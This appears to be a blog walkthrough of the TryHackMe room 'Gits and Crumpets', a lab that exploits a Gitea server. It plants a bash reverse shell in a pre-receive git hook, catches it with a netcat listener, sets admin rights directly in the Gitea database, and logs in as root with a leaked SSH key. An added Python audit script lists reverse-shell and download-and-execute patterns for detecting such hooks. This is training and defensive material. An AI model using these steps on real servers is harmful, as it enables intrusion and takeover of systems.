Our devs have been clamoring for some centralized version control, so the admin came through. Rumour has it that they included a few countermeasures… You can access the room through this link: https://tryhackme.com/room/gitandcrumpets
Hello everyone, this is Mrinal Prakash aka EMPHAY, and today I am going to take you through the walkthrough of the room “Gits and Crumpets”, which is a pretty beginner-friendly room. It comes under the category of medium rooms. Having said all that, let me dive in.
Let me go ahead and deploy the machine
I will run an nmap scan to find the open ports against the target IP address.
After running the scan, I found three services running: SSH on port 22, a web server on port 80 and zeus-admin on port 9090.
When I visited the site running on port 80, it redirected me to a YouTube video.
I used the cURL command and found a description that said the following:
So, after seeing this, I immediately added git.git-and-crumpets.thm to my /etc/hosts file and then visited that website.
I could see the register button up there and I quickly registered myself.
I went on to explore all the repos via http://git.git-and-crumpets.thm/explore/repos.
There are two repositories, so I decided to check each of them,
and I found a hint in cant-touch-this under Delete Passwords File.
It said “Kept the password in my avatar”. So now I will fetch the avatar image and run strings on it to get the password.
Now log in with the email firstname.lastname@example.org and the password Password.
Create a git hook (http://git.git-and-crumpets.thm/scones/cant-touch-this/settings/hooks/git).
Edit the pre-receive hook so that it contains the following code:
bash -i >& /dev/tcp/YOUR_IP/4577 0>&1
Start an nc listener:
root@kali:/home/kali# nc -lvnp 4577
Now change the README file (http://git.git-and-crumpets.thm/scones/cant-touch-this/_edit/master/README.md) and click save.
You should get a reverse shell:
Now list all the files in the present working directory; there I found the user.txt file.
It was in base64 format, so I decoded the flag and then submitted it.
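From the administrator's side, the edited hook above is the artifact to hunt for. The audit script below is an added example, not part of the original walkthrough or of Gitea; it assumes (not confirmed by the room) that Gitea stores a user-edited server hook at <repo>.git/hooks/<name>.d/<name> next to its own <name>.d/gitea delegate, and it flags hook contents that carry reverse-shell or download-and-execute patterns.

```python
"""Audit Gitea server-side git hooks for reverse-shell style payloads (added example).
Assumption: a custom hook lives at <repo>.git/hooks/<name>.d/<name>, Gitea's own at <name>.d/gitea."""
import re
import tempfile
from pathlib import Path

HOOK_NAMES = ("pre-receive", "update", "post-receive")

# Content a defender does not expect in a legitimate server-side hook.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/"),                        # bash network redirection
    re.compile(r"\bbash\s+-i\b"),                     # interactive shell spawned from a hook
    re.compile(r"\bnc\b.*\s-e\s"),                    # netcat with a command bound to it
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),   # download-and-execute
]


def find_custom_hooks(repo_root):
    """Yield user-editable hook files under every bare repository below repo_root."""
    for hooks_dir in Path(repo_root).rglob("hooks"):
        if not hooks_dir.is_dir() or hooks_dir.parent.suffix != ".git":
            continue
        for name in HOOK_NAMES:
            custom = hooks_dir / f"{name}.d" / name   # assumed Gitea layout
            if custom.is_file():
                yield custom


def audit_hooks(repo_root):
    """Return (hook_path, offending_line) pairs for every hook line matching SUSPICIOUS."""
    findings = []
    for hook in find_custom_hooks(repo_root):
        for line in hook.read_text(errors="replace").splitlines():
            if any(p.search(line) for p in SUSPICIOUS):
                findings.append((str(hook), line.strip()))
    return findings


def demo():
    """Constructed repo tree: one benign hook, one carrying the walkthrough's payload."""
    with tempfile.TemporaryDirectory() as tmp:
        for repo, body in (
            ("alice/notes.git", "#!/bin/bash\nexit 0\n"),
            ("scones/cant-touch-this.git", "#!/bin/bash\nbash -i >& /dev/tcp/YOUR_IP/4577 0>&1\n"),
        ):
            d = Path(tmp, repo, "hooks", "pre-receive.d")
            d.mkdir(parents=True)
            (d / "gitea").write_text("#!/usr/bin/env bash\ngitea hook pre-receive\n")
            (d / "pre-receive").write_text(body)
        # Report only the repository directory name, since tmp is random.
        return [(Path(p).parents[2].name, line) for p, line in audit_hooks(tmp)]
```

Run it against Gitea's repository root (the path configured as ROOT under [repository] in app.ini) from a cron job; a non-empty result means someone has planted executable content in a server hook.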
Look at the Gitea database and update the user you are logged in as to admin:
[git@git-and-crumpets tmp]$ sqlite3 /var/lib/gitea/data/gitea.db
update user set is_admin=1 where id=3;
Now you can see all repos, including those on the scones account (http://git.git-and-crumpets.thm/admin/repos). Go to the backup repo, switch to the second branch and look at the commits (http://git.git-and-crumpets.thm/root/backup/commits/branch/dotfiles).
There you will find the OpenSSH private key (http://git.git-and-crumpets.thm/root/backup/commit/0b23539d97978fc83b763ef8a4b3882d16e71d32):
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
Copy this key and put it in the file /home/git/.ssh/id_rsa (don't forget chmod):
[git@git-and-crumpets .ssh]$ export TERM=xterm
[git@git-and-crumpets .ssh]$ nano /home/git/.ssh/id_rsa
# do paste (shift+insert)
# then exit and save (ctrl+x then press y)
[git@git-and-crumpets .ssh]$ chmod 600 /home/git/.ssh/id_rsa
Now log in with ssh (the passphrase for the key is hinted at in the backup repo: Sup3rS3cur3):
[git@git-and-crumpets .ssh]$ ssh -i id_rsa root@localhost
Enter passphrase for key 'id_rsa': Sup3rS3cur3
[root@git-and-crumpets ~]# cat /root/root.txt | base64 -d
This completes our room, and that was it from me. If you enjoyed reading this, do give it a clap and follow me on Medium. If you face any problem regarding any solution, feel free to reach out to me. I hope you enjoyed reading my work. If you really liked this article, follow me on Medium and Twitter and connect with me on LinkedIn. Till then, goodbye from my side and Happy Hacking.